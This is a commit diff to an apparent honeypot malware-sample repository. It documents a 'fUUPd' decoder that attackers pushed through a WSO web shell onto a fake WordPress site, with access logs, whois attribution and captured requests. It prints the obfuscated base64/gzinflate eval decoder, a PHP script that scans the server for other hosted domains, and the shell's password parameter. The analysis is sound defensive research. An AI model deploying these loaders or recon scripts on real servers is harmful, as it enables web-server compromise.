Add fUUPd decoder.

README.md

@@ -233,3 +233,9 @@ backdoor.
 WSO 2.5 web shell, with a novel, 2-step obfuscation.
 Attacker also added some anti-search-discovery code.
 Most amusing.
+
+## [Common Decoder #1 - fUUPd](fUUPd)
+
+PHP file downloaded via WSO that decodes and
+evals some encoded PHP. Some obfuscation of
+both encoded PHP payload and the decoding PHP.

b374k_3.2.3.php/README.md

@@ -3,7 +3,7 @@
 *b374k shell 3.2.3 - 2018-03-02*
 
 An instance of b374k web shell, with a strange
-code retrieval from EXIF data in 
+code retrieval from EXIF data in a JPG image from googleusercontent.com
 
 [Another instance](https://github.com/nsuchy/php-malware-samples/tree/master/b374k-shell) of b374k (v2.8)
 which differs substantially from the b374k code here.

campaign1/README.md

@@ -12,7 +12,7 @@ HTTP accesses retrieved `favicon.ico`, `style.css`,
 `navigation.js`, others indicating use of a web
 browser, not some program. Fairly rare occurance.
 
-[HTTP_USER_AGENT] => Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.186 Safari/537.36
+User agent is `Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.186 Safari/537.36`
 
 Login via admin/1234qwer without any guessing.
 
@@ -31,8 +31,6 @@ More apparently interactive use of WSO listing, tar,
 move subactions.
 
 
-
-
 ## Origin
 
 ### IP Address 88.240.107.37

fUUPd/README.md

@@ -0,0 +1,57 @@
+# fUUPd - Common Decoder #1
+
+A fairly basic decoder.
+
+## Origin
+
+### IP Address 195.154.220.30
+
+195.154.220.30 has DNS name 30.220.154.rdns.systems
+
+`rdns.systems` has this `whois` info:
+
+    Domain Name: rdns.systems
+    Tech Organization: Technology LLC
+    Tech Street: c/o IDPS International Domain Privacy Services GmbH Hansaallee 191
+    Tech City: Duesseldorf
+    Tech State/Province: 
+    Tech Postal Code: 40549
+    Tech Country: DE
+
+195.154.220.30  has different `whois` info:
+
+    route:          195.154.0.0/16
+    descr:          Online SAS
+    descr:          Paris, France
+    origin:         AS12876
+    mnt-by:         MNT-TISCALIFR
+    created:        2013-08-02T09:05:22Z
+    last-modified:  2013-08-02T09:05:22Z
+
+### Download
+
+The attacker intended to use a WSO, "Web Shell by oRb" instance
+to download the code to my WordPress honey pot. The attacker
+wanted to use the "FilesMan" action of WSO, "uploadFile" sub-action.
+
+This would leave a file behind.
+
+## Decoder
+
+    <?php
+    function fUUPd($NVAR)
+    {
+        $NVAR = gzinflate(base64_decode($NVAR));
+        for ($i = 0; $i < strlen($NVAR); $i++) {
+            $NVAR[$i] = chr(ord($NVAR[$i]) - 1);
+        }
+        return $NVAR;
+    }
+    eval(fUUPd("jbvnz.../9y//5f/x/"));
+
+Decompresses decoded Base64-encoded bytes, then shifts them one
+(numeric) value down. So for ASCII text, 'G' (0x47 as a number)
+would become 'F' (0x46 as a number). That counts as a "Caesar Cipher".
+
+Makes no attempt to hide the `base64_decode()` or `eval()` function calls,
+but the function name `fUUPd` does seem to be obfuscated.

fUUPd/accesses

@@ -0,0 +1,18 @@
+195.154.220.30 - - [19/Mar/2018:05:31:45 -0600] "POST /wordpress/wp-content/plugins/revslider/temp/update_extract/revslider/db.php HTTP/1.1" 200 83590 "-" "Mozilla/5.0 (Windows NT 6.1; rv:24.0) Gecko/20100101 Firefox/24.0"
+195.154.220.30 - - [19/Mar/2018:05:31:48 -0600] "POST /wordpress/wp-content/plugins/revslider/temp/update_extract/revslider/db.php HTTP/1.1" 200 65 "-" "Mozilla/5.0 (Windows NT 5.1; rv:24.0) Gecko/20100101 Firefox/24.0"
+195.154.220.30 - - [21/Mar/2018:13:29:34 -0600] "POST /wordpress/wp-content/plugins/revslider/temp/update_extract/revslider/db.php HTTP/1.1" 200 83590 "-" "Mozilla/5.0 (Windows NT 6.0; rv:25.0) Gecko/20100101 Firefox/25.0"
+195.154.220.30 - - [21/Mar/2018:13:29:35 -0600] "POST /wordpress/wp-content/plugins/revslider/temp/update_extract/revslider/db.php HTTP/1.1" 200 65 "-" "Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20130331 Firefox/21.0"
+195.154.220.30 - - [21/Mar/2018:14:35:05 -0600] "POST /wordpress/wp-content/plugins/revslider/temp/update_extract/revslider/db.php HTTP/1.1" 200 14030 "http://stratigery.com/wordpress/wp-content/plugins/revslider/temp/update_extract/revslider/db.php" "Opera/9.80 (Windows NT 6.1) Presto/2.12.388 Version/12.17"
+195.154.220.30 - - [21/Mar/2018:14:35:05 -0600] "POST /wordpress/wp-content/plugins/revslider/temp/update_extract/revslider/db.php HTTP/1.1" 200 14030 "http://stratigery.com/wordpress/wp-content/plugins/revslider/temp/update_extract/revslider/db.php" "Opera/9.80 (Windows NT 6.1) Presto/2.12.388 Version/12.17"
+195.154.220.30 - - [21/Mar/2018:14:35:06 -0600] "POST /wordpress/wp-content/plugins/revslider/temp/update_extract/revslider/db.php HTTP/1.1" 200 21865 "http://stratigery.com/wordpress/wp-content/plugins/revslider/temp/update_extract/revslider/db.php" "Opera/9.80 (Windows NT 6.1) Presto/2.12.388 Version/12.17"
+195.154.220.30 - - [21/Mar/2018:14:35:07 -0600] "POST /wordpress/wp-content/plugins/revslider/temp/update_extract/revslider/db.php HTTP/1.1" 200 21865 "http://stratigery.com/wordpress/wp-content/plugins/revslider/temp/update_extract/revslider/db.php" "Opera/9.80 (Windows NT 6.1) Presto/2.12.388 Version/12.17"
+195.154.220.30 - - [21/Mar/2018:16:00:58 -0600] "POST /wordpress/wp-content/plugins/revslider/temp/update_extract/revslider/db.php HTTP/1.1" 200 14030 "http://stratigery.com/wordpress/wp-content/plugins/revslider/temp/update_extract/revslider/db.php" "Opera/9.80 (Windows NT 6.1) Presto/2.12.388 Version/12.17"
+195.154.220.30 - - [21/Mar/2018:16:00:59 -0600] "POST /wordpress/wp-content/plugins/revslider/temp/update_extract/revslider/db.php HTTP/1.1" 200 21865 "http://stratigery.com/wordpress/wp-content/plugins/revslider/temp/update_extract/revslider/db.php" "Opera/9.80 (Windows NT 6.1) Presto/2.12.388 Version/12.17"
+195.154.220.30 - - [21/Mar/2018:16:01:00 -0600] "POST /wordpress/wp-content/plugins/revslider/temp/update_extract/revslider/db.php HTTP/1.1" 200 14030 "http://stratigery.com/wordpress/wp-content/plugins/revslider/temp/update_extract/revslider/db.php" "Opera/9.80 (Windows NT 6.1) Presto/2.12.388 Version/12.17"
+195.154.220.30 - - [21/Mar/2018:16:01:01 -0600] "POST /wordpress/wp-content/plugins/revslider/temp/update_extract/revslider/db.php HTTP/1.1" 200 21865 "http://stratigery.com/wordpress/wp-content/plugins/revslider/temp/update_extract/revslider/db.php" "Opera/9.80 (Windows NT 6.1) Presto/2.12.388 Version/12.17"
+195.154.220.30 - - [21/Mar/2018:16:01:02 -0600] "POST /wordpress/wp-content/plugins/revslider/temp/update_extract/revslider/db.php HTTP/1.1" 200 14030 "http://stratigery.com/wordpress/wp-content/plugins/revslider/temp/update_extract/revslider/db.php" "Opera/9.80 (Windows NT 6.1) Presto/2.12.388 Version/12.17"
+195.154.220.30 - - [21/Mar/2018:16:01:03 -0600] "POST /wordpress/wp-content/plugins/revslider/temp/update_extract/revslider/db.php HTTP/1.1" 200 14030 "http://stratigery.com/wordpress/wp-content/plugins/revslider/temp/update_extract/revslider/db.php" "Opera/9.80 (Windows NT 6.1) Presto/2.12.388 Version/12.17"
+195.154.220.30 - - [21/Mar/2018:16:01:04 -0600] "POST /wordpress/wp-content/plugins/revslider/temp/update_extract/revslider/db.php HTTP/1.1" 200 14030 "http://stratigery.com/wordpress/wp-content/plugins/revslider/temp/update_extract/revslider/db.php" "Opera/9.80 (Windows NT 6.1) Presto/2.12.388 Version/12.17"
+195.154.220.30 - - [21/Mar/2018:16:01:05 -0600] "POST /wordpress/wp-content/plugins/revslider/temp/update_extract/revslider/db.php HTTP/1.1" 200 14030 "http://stratigery.com/wordpress/wp-content/plugins/revslider/temp/update_extract/revslider/db.php" "Opera/9.80 (Windows NT 6.1) Presto/2.12.388 Version/12.17"
+195.154.220.30 - - [21/Mar/2018:16:01:06 -0600] "POST /wordpress/wp-content/plugins/revslider/temp/update_extract/revslider/db.php HTTP/1.1" 200 14030 "http://stratigery.com/wordpress/wp-content/plugins/revslider/temp/update_extract/revslider/db.php" "Opera/9.80 (Windows NT 6.1) Presto/2.12.388 Version/12.17"
+195.154.220.30 - - [21/Mar/2018:16:01:08 -0600] "POST /wordpress/wp-content/plugins/revslider/temp/update_extract/revslider/db.php HTTP/1.1" 200 14030 "http://stratigery.com/wordpress/wp-content/plugins/revslider/temp/update_extract/revslider/db.php" "Opera/9.80 (Windows NT 6.1) Presto/2.12.388 Version/12.17"

fUUPd/files/195.154.220.30Wq@foTrMiYwata7o4pkQbgAAAAI.wso.scans

@@ -0,0 +1,60 @@
+
+_SERVER
+Array
+(
+    [UNIQUE_ID] => Wq@foTrMiYwata7o4pkQbgAAAAI
+    [SCRIPT_URL] => /wordpress/wp-content/plugins/revslider/temp/update_extract/revslider/db.php
+    [SCRIPT_URI] => http://stratigery.com/wordpress/wp-content/plugins/revslider/temp/update_extract/revslider/db.php
+    [HTTP_HOST] => stratigery.com
+    [HTTP_CONNECTION] => close
+    [HTTP_ACCEPT_ENCODING] => gzip,deflate
+    [CONTENT_TYPE] => application/x-www-form-urlencoded
+    [CONTENT_LENGTH] => 25
+    [HTTP_USER_AGENT] => Mozilla/5.0 (Windows NT 6.1; rv:24.0) Gecko/20100101 Firefox/24.0
+    [PATH] => /usr/local/sbin:/usr/local/bin:/usr/bin
+    [SERVER_SIGNATURE] => 
+    [SERVER_SOFTWARE] => Apache/2.4.29 (Unix) PHP/7.2.3
+    [SERVER_NAME] => stratigery.com
+    [SERVER_ADDR] => 162.246.45.144
+    [SERVER_PORT] => 80
+    [REMOTE_ADDR] => 195.154.220.30
+    [DOCUMENT_ROOT] => /srv/http/stratigery/htdocs
+    [REQUEST_SCHEME] => http
+    [CONTEXT_PREFIX] => 
+    [CONTEXT_DOCUMENT_ROOT] => /srv/http/stratigery/htdocs
+    [SERVER_ADMIN] => bediger@stratigery.com
+    [SCRIPT_FILENAME] => /srv/http/stratigery/htdocs/fake_wp/wso.php
+    [REMOTE_PORT] => 51792
+    [GATEWAY_INTERFACE] => CGI/1.1
+    [SERVER_PROTOCOL] => HTTP/1.1
+    [REQUEST_METHOD] => POST
+    [QUERY_STRING] => 
+    [REQUEST_URI] => /wordpress/wp-content/plugins/revslider/temp/update_extract/revslider/db.php
+    [SCRIPT_NAME] => /wordpress/wp-content/plugins/revslider/temp/update_extract/revslider/db.php
+    [PHP_SELF] => /wordpress/wp-content/plugins/revslider/temp/update_extract/revslider/db.php
+    [REQUEST_TIME_FLOAT] => 1521459105.41
+    [REQUEST_TIME] => 1521459105
+)
+
+_REQUEST
+Array
+(
+    [a] => Php
+    [p2] => info
+    [pass] => nhzgrf
+)
+
+_COOKIE
+ Array
+(
+)
+
+_FILES
+
+END _FILES
+ $my_blog=http://stratigery.com/wordpress/wp-content/plugins/revslider/temp/update_extract/revslider
+pass parameter, acting as WSO
+Acting as WSO, login cookie.
+a = Php
+p2 = info
+Acting as WSO, send phpinfo.

fUUPd/files/195.154.220.30Wq@fpMO6JG7vg4KcqrwY8wAAAAU.php.file

@@ -0,0 +1,20 @@
+error_reporting(0);
+$startDir = str_replace('\\', '/', $_SERVER['DOCUMENT_ROOT']);
+$domZones = '(\.ru|\.ru\.com|\.ru\.net|\.com\.ru|\.org\.ru|\.net\.ru|\.msk\.ru|\.msk\.su|\.spb\.ru|\.spb\.su|\.nov\.ru|\.nov\.su|\.edu\.ru|\.int\.ru|\.ac\.ru|\.pp\.ru|\.su|\.ua|\.com\.ua|\.co\.ua|\.biz\.ua|\.kiev\.ua|\.org\.ua|\.net\.ua|\.pp\.ua|\.dp\.ua|\.sumy\.ua|\.uz\.ua|ks\.ua|\.pl\.ua|\.if\.ua|\.cv\.ua|\.rv\.ua|\.mk\.ua|\.dn\.ua|\.lg\.ua|\.kh\.ua|\.zp\.ua|\.od\.ua|\.ck\.ua|\.kr\.ua|\.lutsk\.ua|\.volin\.ua|\.zt\.ua|\.yalta\.ua|\.sevastopol\.ua|\.cremea\.ua|\.com|\.edu|\.gov|\.net|\.org|\.biz|\.info|\.name|\.jobs|\.mobi|\.tel|\.travel|\.az|\.am|\.by|\.ge|\.kz|\.kg|\.lv|\.lt|\.md|\.ru|\.su|\.tj|\.tm|\.uz|\.ua|\.ad|\.at|\.be|\.ch|\.de|\.dk|\.es|\.eu|\.fi|\.fr|\.gr|\.ie|\.is|\.it|\.li|\.lu|\.mc|\.mt|\.nl|\.no|\.pt|\.se|\.uk|\.al|\.bg|\.cz|\.hu|\.mk|\.pl|\.ro|\.si|\.sk|\.ac|\.ag|\.as|\.asia|\.au|\.br|\.bz|\.ca|\.cat|\.cc|\.cd|\.ck|\.cl|\.cn|\.cx|\.gi|\.gs|\.hk|\.hm|\.hn|\.im|\.in|\.jp|\.kr|\.la|\.lk|\.me|\.mn|\.ms|\.mx|\.my|\.nz|\.pk|\.sg|\.sh|\.st|\.tc|\.th|\.tk|\.to|\.tv|\.tw|\.us|\.vc|\.vg|\.ws|\.za)';
+
+function GetDomains($dirs, $preDomainPath, $postDomainPath, $domZones) {
+	foreach($dirs as $dir) {
+		if(preg_match('#'.$domZones.'(\/(.*?)$|$)#', $dir, $matches) && !preg_match('#('.str_replace('www.', '', $_SERVER['HTTP_HOST']).')|('.$_SERVER['HTTP_HOST'].')#', $dir)) {
+                        $domainPath = rtrim($preDomainPath.'/'.$dir.'/'.$postDomainPath, '/');
+                        if(is_dir($domainPath)) {
+							echo $domainPath.';'.$dir.'@';
+                        }			
+		}
+	}
+}
+
+GetDomains(scandir($startDir), $startDir, '', $domZones);
+if(preg_match('#^(.*?)\/([^\/]+'.$domZones.')\/*(.*?)$#', $startDir, $matches)) {
+	$domainDirs = scandir($matches[1]);
+	GetDomains($domainDirs, $matches[1], $matches[4], $domZones);
+};

fUUPd/files/195.154.220.30Wq@fpMO6JG7vg4KcqrwY8wAAAAU.wso.scans

@@ -0,0 +1,98 @@
+
+_SERVER
+Array
+(
+    [UNIQUE_ID] => Wq@fpMO6JG7vg4KcqrwY8wAAAAU
+    [SCRIPT_URL] => /wordpress/wp-content/plugins/revslider/temp/update_extract/revslider/db.php
+    [SCRIPT_URI] => http://stratigery.com/wordpress/wp-content/plugins/revslider/temp/update_extract/revslider/db.php
+    [HTTP_HOST] => stratigery.com
+    [HTTP_CONNECTION] => close
+    [HTTP_ACCEPT_ENCODING] => gzip,deflate
+    [CONTENT_TYPE] => application/x-www-form-urlencoded
+    [CONTENT_LENGTH] => 3010
+    [HTTP_USER_AGENT] => Mozilla/5.0 (Windows NT 5.1; rv:24.0) Gecko/20100101 Firefox/24.0
+    [HTTP_COOKIE] => d8670190bc460b6abebf276d20db5892=866fd58d77526c1bda8771b5b21d5b11
+    [PATH] => /usr/local/sbin:/usr/local/bin:/usr/bin
+    [SERVER_SIGNATURE] => 
+    [SERVER_SOFTWARE] => Apache/2.4.29 (Unix) PHP/7.2.3
+    [SERVER_NAME] => stratigery.com
+    [SERVER_ADDR] => 162.246.45.144
+    [SERVER_PORT] => 80
+    [REMOTE_ADDR] => 195.154.220.30
+    [DOCUMENT_ROOT] => /srv/http/stratigery/htdocs
+    [REQUEST_SCHEME] => http
+    [CONTEXT_PREFIX] => 
+    [CONTEXT_DOCUMENT_ROOT] => /srv/http/stratigery/htdocs
+    [SERVER_ADMIN] => bediger@stratigery.com
+    [SCRIPT_FILENAME] => /srv/http/stratigery/htdocs/fake_wp/wso.php
+    [REMOTE_PORT] => 51964
+    [GATEWAY_INTERFACE] => CGI/1.1
+    [SERVER_PROTOCOL] => HTTP/1.1
+    [REQUEST_METHOD] => POST
+    [QUERY_STRING] => 
+    [REQUEST_URI] => /wordpress/wp-content/plugins/revslider/temp/update_extract/revslider/db.php
+    [SCRIPT_NAME] => /wordpress/wp-content/plugins/revslider/temp/update_extract/revslider/db.php
+    [PHP_SELF] => /wordpress/wp-content/plugins/revslider/temp/update_extract/revslider/db.php
+    [REQUEST_TIME_FLOAT] => 1521459108.645
+    [REQUEST_TIME] => 1521459108
+)
+
+_REQUEST
+Array
+(
+    [a] => Php
+    [p1] => error_reporting(0);
+$startDir = str_replace('\\', '/', $_SERVER['DOCUMENT_ROOT']);
+$domZones = '(\.ru|\.ru\.com|\.ru\.net|\.com\.ru|\.org\.ru|\.net\.ru|\.msk\.ru|\.msk\.su|\.spb\.ru|\.spb\.su|\.nov\.ru|\.nov\.su|\.edu\.ru|\.int\.ru|\.ac\.ru|\.pp\.ru|\.su|\.ua|\.com\.ua|\.co\.ua|\.biz\.ua|\.kiev\.ua|\.org\.ua|\.net\.ua|\.pp\.ua|\.dp\.ua|\.sumy\.ua|\.uz\.ua|ks\.ua|\.pl\.ua|\.if\.ua|\.cv\.ua|\.rv\.ua|\.mk\.ua|\.dn\.ua|\.lg\.ua|\.kh\.ua|\.zp\.ua|\.od\.ua|\.ck\.ua|\.kr\.ua|\.lutsk\.ua|\.volin\.ua|\.zt\.ua|\.yalta\.ua|\.sevastopol\.ua|\.cremea\.ua|\.com|\.edu|\.gov|\.net|\.org|\.biz|\.info|\.name|\.jobs|\.mobi|\.tel|\.travel|\.az|\.am|\.by|\.ge|\.kz|\.kg|\.lv|\.lt|\.md|\.ru|\.su|\.tj|\.tm|\.uz|\.ua|\.ad|\.at|\.be|\.ch|\.de|\.dk|\.es|\.eu|\.fi|\.fr|\.gr|\.ie|\.is|\.it|\.li|\.lu|\.mc|\.mt|\.nl|\.no|\.pt|\.se|\.uk|\.al|\.bg|\.cz|\.hu|\.mk|\.pl|\.ro|\.si|\.sk|\.ac|\.ag|\.as|\.asia|\.au|\.br|\.bz|\.ca|\.cat|\.cc|\.cd|\.ck|\.cl|\.cn|\.cx|\.gi|\.gs|\.hk|\.hm|\.hn|\.im|\.in|\.jp|\.kr|\.la|\.lk|\.me|\.mn|\.ms|\.mx|\.my|\.nz|\.pk|\.sg|\.sh|\.st|\.tc|\.th|\.tk|\.to|\.tv|\.tw|\.us|\.vc|\.vg|\.ws|\.za)';
+
+function GetDomains($dirs, $preDomainPath, $postDomainPath, $domZones) {
+	foreach($dirs as $dir) {
+		if(preg_match('#'.$domZones.'(\/(.*?)$|$)#', $dir, $matches) && !preg_match('#('.str_replace('www.', '', $_SERVER['HTTP_HOST']).')|('.$_SERVER['HTTP_HOST'].')#', $dir)) {
+                        $domainPath = rtrim($preDomainPath.'/'.$dir.'/'.$postDomainPath, '/');
+                        if(is_dir($domainPath)) {
+							echo $domainPath.';'.$dir.'@';
+                        }			
+		}
+	}
+}
+
+GetDomains(scandir($startDir), $startDir, '', $domZones);
+if(preg_match('#^(.*?)\/([^\/]+'.$domZones.')\/*(.*?)$#', $startDir, $matches)) {
+	$domainDirs = scandir($matches[1]);
+	GetDomains($domainDirs, $matches[1], $matches[4], $domZones);
+};
+)
+
+_COOKIE
+ Array
+(
+    [d8670190bc460b6abebf276d20db5892] => 866fd58d77526c1bda8771b5b21d5b11
+)
+
+_FILES
+
+END _FILES
+ $my_blog=http://stratigery.com/wordpress/wp-content/plugins/revslider/temp/update_extract/revslider
+Acting as WSO, login cookie.
+a = Php
+p1 = error_reporting(0);
+$startDir = str_replace('\\', '/', $_SERVER['DOCUMENT_ROOT']);
+$domZones = '(\.ru|\.ru\.com|\.ru\.net|\.com\.ru|\.org\.ru|\.net\.ru|\.msk\.ru|\.msk\.su|\.spb\.ru|\.spb\.su|\.nov\.ru|\.nov\.su|\.edu\.ru|\.int\.ru|\.ac\.ru|\.pp\.ru|\.su|\.ua|\.com\.ua|\.co\.ua|\.biz\.ua|\.kiev\.ua|\.org\.ua|\.net\.ua|\.pp\.ua|\.dp\.ua|\.sumy\.ua|\.uz\.ua|ks\.ua|\.pl\.ua|\.if\.ua|\.cv\.ua|\.rv\.ua|\.mk\.ua|\.dn\.ua|\.lg\.ua|\.kh\.ua|\.zp\.ua|\.od\.ua|\.ck\.ua|\.kr\.ua|\.lutsk\.ua|\.volin\.ua|\.zt\.ua|\.yalta\.ua|\.sevastopol\.ua|\.cremea\.ua|\.com|\.edu|\.gov|\.net|\.org|\.biz|\.info|\.name|\.jobs|\.mobi|\.tel|\.travel|\.az|\.am|\.by|\.ge|\.kz|\.kg|\.lv|\.lt|\.md|\.ru|\.su|\.tj|\.tm|\.uz|\.ua|\.ad|\.at|\.be|\.ch|\.de|\.dk|\.es|\.eu|\.fi|\.fr|\.gr|\.ie|\.is|\.it|\.li|\.lu|\.mc|\.mt|\.nl|\.no|\.pt|\.se|\.uk|\.al|\.bg|\.cz|\.hu|\.mk|\.pl|\.ro|\.si|\.sk|\.ac|\.ag|\.as|\.asia|\.au|\.br|\.bz|\.ca|\.cat|\.cc|\.cd|\.ck|\.cl|\.cn|\.cx|\.gi|\.gs|\.hk|\.hm|\.hn|\.im|\.in|\.jp|\.kr|\.la|\.lk|\.me|\.mn|\.ms|\.mx|\.my|\.nz|\.pk|\.sg|\.sh|\.st|\.tc|\.th|\.tk|\.to|\.tv|\.tw|\.us|\.vc|\.vg|\.ws|\.za)';
+
+function GetDomains($dirs, $preDomainPath, $postDomainPath, $domZones) {
+	foreach($dirs as $dir) {
+		if(preg_match('#'.$domZones.'(\/(.*?)$|$)#', $dir, $matches) && !preg_match('#('.str_replace('www.', '', $_SERVER['HTTP_HOST']).')|('.$_SERVER['HTTP_HOST'].')#', $dir)) {
+                        $domainPath = rtrim($preDomainPath.'/'.$dir.'/'.$postDomainPath, '/');
+                        if(is_dir($domainPath)) {
+							echo $domainPath.';'.$dir.'@';
+                        }			
+		}
+	}
+}
+
+GetDomains(scandir($startDir), $startDir, '', $domZones);
+if(preg_match('#^(.*?)\/([^\/]+'.$domZones.')\/*(.*?)$#', $startDir, $matches)) {
+	$domainDirs = scandir($matches[1]);
+	GetDomains($domainDirs, $matches[1], $matches[4], $domZones);
+};
+Acting as WSO PHP eval, recognized GetDomains.

fUUPd/files/195.154.220.30WqmW4mED2UVKHNYWN2GUbAAAAAU.wso.scans

@@ -0,0 +1,60 @@
+
+_SERVER
+Array
+(
+    [UNIQUE_ID] => WqmW4mED2UVKHNYWN2GUbAAAAAU
+    [SCRIPT_URL] => /wordpress/wp-content/plugins/revslider/temp/update_extract/revslider/db.php
+    [SCRIPT_URI] => http://stratigery.com/wordpress/wp-content/plugins/revslider/temp/update_extract/revslider/db.php
+    [HTTP_HOST] => stratigery.com
+    [HTTP_CONNECTION] => close
+    [HTTP_ACCEPT_ENCODING] => gzip,deflate
+    [CONTENT_TYPE] => application/x-www-form-urlencoded
+    [CONTENT_LENGTH] => 25
+    [HTTP_USER_AGENT] => Mozilla/5.0 (Windows NT 6.0; rv:25.0) Gecko/20100101 Firefox/25.0
+    [PATH] => /usr/local/sbin:/usr/local/bin:/usr/bin
+    [SERVER_SIGNATURE] => 
+    [SERVER_SOFTWARE] => Apache/2.4.29 (Unix) PHP/7.2.3
+    [SERVER_NAME] => stratigery.com
+    [SERVER_ADDR] => 162.246.45.144
+    [SERVER_PORT] => 80
+    [REMOTE_ADDR] => 195.154.220.30
+    [DOCUMENT_ROOT] => /srv/http/stratigery/htdocs
+    [REQUEST_SCHEME] => http
+    [CONTEXT_PREFIX] => 
+    [CONTEXT_DOCUMENT_ROOT] => /srv/http/stratigery/htdocs
+    [SERVER_ADMIN] => bediger@stratigery.com
+    [SCRIPT_FILENAME] => /srv/http/stratigery/htdocs/fake_wp/wso.php
+    [REMOTE_PORT] => 64216
+    [GATEWAY_INTERFACE] => CGI/1.1
+    [SERVER_PROTOCOL] => HTTP/1.1
+    [REQUEST_METHOD] => POST
+    [QUERY_STRING] => 
+    [REQUEST_URI] => /wordpress/wp-content/plugins/revslider/temp/update_extract/revslider/db.php
+    [SCRIPT_NAME] => /wordpress/wp-content/plugins/revslider/temp/update_extract/revslider/db.php
+    [PHP_SELF] => /wordpress/wp-content/plugins/revslider/temp/update_extract/revslider/db.php
+    [REQUEST_TIME_FLOAT] => 1521063650.808
+    [REQUEST_TIME] => 1521063650
+)
+
+_REQUEST
+Array
+(
+    [a] => Php
+    [p2] => info
+    [pass] => nhzgrf
+)
+
+_COOKIE
+ Array
+(
+)
+
+_FILES
+
+END _FILES
+ $my_blog=http://stratigery.com/wordpress/wp-content/plugins/revslider/temp/update_extract/revslider
+pass parameter, acting as WSO
+Acting as WSO, login cookie.
+a = Php
+p2 = info
+Acting as WSO, send phpinfo.